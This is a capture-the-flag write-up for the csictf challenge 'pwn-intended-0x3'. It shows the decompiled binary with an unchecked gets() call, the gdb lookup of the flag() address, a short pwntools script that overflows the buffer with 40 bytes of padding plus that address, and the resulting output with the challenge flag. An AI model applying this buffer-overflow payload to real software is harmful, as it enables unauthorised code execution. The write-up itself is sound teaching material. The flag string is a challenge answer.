CSICTF-Writeups/Pwn/pwn-intended-0x3/README.md

1.7 KiB

pwn-intended-0x3

The main idea finding the flag is overwrite the correct hex after padding.

Step-1:

After I downloaded pwn-intended-0x3, I reversed it with IDA, I got this source code:

main() function:

undefined8 main(void)

{
  char local_28 [32];

  setbuf(stdout,(char *)0x0);
  setbuf(stdin,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  puts("Welcome to csictf! Time to teleport again.");
  gets(local_28);
  return 0;
}

flag() function:

void flag(void)

{
  puts("Well, that was quick. Here\'s your flag:");
  system("cat flag.txt");
                    /* WARNING: Subroutine does not return */
  exit(0);
}

Step-2:

I just had to write the address of the flag function after 32+8 bytes.

So I tried using Debugger to get the address of the flag.

echo into functions | gdb ./pwn-intended-0x3 | grep flag

I got this output: 0x00000000004011ce flag

Step-3:

I wrote a very common rev_exploit.py to pwn into the machine.

import pwn

r = pwn.remote('chall.csivit.com', 30013)

payload = "A"*40 + '\xce\x11@\x00\x00\x00\x00\x00'

r.sendline(payload)
r.interactive()

Step-4:

When I finally ran this python3 rev_exploit.py, I got this output:

[+] Opening connection to chall.csivit.com on port 30013: Done
[*] Switching to interactive mode
Welcome to csictf! Time to teleport again.
Well, that was quick. Here's your flag:
You've reached your destination, here's a flag!
csictf{ch4lleng1ng_th3_v3ry_l4ws_0f_phys1cs}[*] Got EOF while reading in interactive 
$
[*] Interrupted

Voila! I got the flag there.

Step-5:

Finally the flag becomes: csictf{ch4lleng1ng_th3_v3ry_l4ws_0f_phys1cs}